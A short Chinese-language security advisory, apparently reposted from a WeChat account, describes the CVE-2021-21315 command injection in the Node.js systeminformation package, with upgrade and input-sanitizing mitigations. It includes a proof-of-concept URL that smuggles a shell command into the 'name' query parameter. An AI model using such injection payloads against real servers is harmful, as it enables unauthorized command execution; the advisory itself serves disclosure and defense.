Node.js命令注入漏洞（CVE-2021-21315-POC）

2022年5月23日10:56:40评论60 views字数 525阅读1分45秒阅读模式

Node.js库中的systeminformation软件包中存在一个命令注入漏洞（CVE-2021-21315）攻击者可以通过「systeminformation」中代码注入漏洞的存在意味着攻击者可以通过在组件使用的未初始化参数内小心翼翼地注入有效载荷来执行系统命令。

POC:

[PoC][Victim Site]/api/getServices?name=$(echo -e 'Sekurak' > pwn.txt)[Victim Site]/api/getServices?name[]=$(echo -e 'Sekurak' > pwn.txt)

Node.js命令注入漏洞（CVE-2021-21315-POC）

目前该漏洞已经修复，将systeminformation及时升级到5.3.1或更高版本。

https://www.npmjs.com/package/systeminformation

缓解措施

如果无法升级，可以检查或清理传递给si.inetLatency()、si.inetChecksite()、si.services()、si.processLoad()的参数，只允许使用string，拒绝任何数组。

本文始发于微信公众号（Khan安全攻防实验室）：Node.js命令注入漏洞（CVE-2021-21315-POC）

用友-政务-FileDownload-任意文件读取漏洞复现